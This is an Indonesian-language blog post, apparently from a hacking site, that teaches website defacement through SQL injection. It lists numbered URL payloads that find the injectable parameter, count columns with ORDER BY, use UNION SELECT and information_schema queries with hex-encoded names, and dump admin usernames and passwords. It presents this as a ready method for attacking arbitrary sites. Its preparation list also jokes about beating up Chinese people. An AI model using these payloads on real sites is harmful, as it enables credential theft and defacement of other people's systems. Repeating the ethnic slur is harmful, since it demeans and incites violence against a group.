dari liat judul pastinya udah pada tau kan deface apaan...
oke klo gtu..
1. pertama-tama siapin dolo satu buah kompie ato lapie yg konek internet (klo nggak ada trus mau ngdeface apaan??)
2. siapin rokok marlboro light juga (buat jaga2 d klo pukulin cina)
3. segelas cofemix (biar nggak ngantuk)
4. konsentrasi
5. ni bner2 srius y...
-=[1]=-
buka firefox trus tentukan target...
contoh : [web]/news.php?id=2
klo udah sekarang kita cari errornya...
dengan care nambahkan caracter ( ' ) d belakang link...
contoh : [web]/news.php?id=2'
-=[2]=-
sekarang kita menghitung jumlah table..
dengan cara menambahkan perintah +order+by+
contoh : [web]/news.php?id=-2+order+by+1--
sekarang cek satu per satu sampe kluar errornya...
contoh :
[web]/news.php?id=-2+order+by+1--
[web]/news.php?id=-2+order+by+2--
[web]/news.php?id=-2+order+by+3--
[web]/news.php?id=-2+order+by+4--
misalnya pas d angka 5 udah error brt kita ambil angka 4...
-=[3]=-
untuk mengetahui angka table kita gunakan perintah union
dengan mengganti order by dengan +union+select+1,2,3,4
contoh : [web]/news.php?id=-2+union+select+1,2,3,4--
ntar akan muncul angka yg berwarna atau yg bold..
nah angka itu yg kita gunakan... misal angka 2..
-=[4]=-
skarang kita check tabel²nya
dengan mengganti anggak 2 dengan group_concat(table_name) trus dibelakang anggak 4 kita tambahkan +from+information_schema.tables+where+table_schema=database()
nanti akan muncul tulisan2...
cari yg tulisan itu berhubungan dengan username n pass admin..
-=[5]=-
ok klo udah copas tulisan yg berhubungan ama id admin itu d sini
http://home2.paulschou.net/tools/xlate/
convert tulisan ntu trus c encode lo ambil yg code hex nya..
misal hasilnya : 65 73 65 72 5f 69 64 nah ni spasinya d hapus jadinya kyk gni 657365725f6964 oke udah smua kan...q lanjut yach...
-=[6]=-
klo udah sekarang kita bentuk username n pass admin dengan cara mengganti group_concat(table_name)
menjadi
group_concat(column_name)
trus d belakang angka 4 juga ganti +from+information_schema.columns+where+table_name=0x7373635f75736572
misal kluarnya (user_id,password)
-=[7]=-
klo udah kluar bentuk tulisannya sekarang kita ganti
group_concat(column_name)
menjadi
concat_ws(user_id,0x3a,password)
trus d belakang angka 4 juga d tambahin
+from+ssc_user
klik enter dan liat tuh username admin n pass nya udah bisa d liat...
ckakakaa....
segini dulu deh dari gue...
mudah-mudah bermanfaat..
predator_h4ck
dimas_cs04
You are visitor:
Popular Posts
-
Anda pasti pernah ingin masuk ke Member Area suatu web, yaitu halaman khusus untuk para member suatu web, dimana hanya para membernya saja y...
-
untuk download firmware silahkan klik download dibawah ini.. DOWNLOAD
-
Situs kesayangan anda diblokir oleh ISP Anda, menyebalkan pastinya. Kebebasan berinternet lenyap sudah, situ ini diblokir situs itu diblok... -
Sebel jika ingin download dari link mediafire ternyata link tersebut sudah mati, dan yang tersisa cuman link luar seperti netload, rapidsh... -
Berikut adalah beberapa trik sederhana untuk mempercepat kinerja Firefox anda. Trik – trik ini memungkinkan Firefox untuk mengunduh halaman ...
No comments:
Post a Comment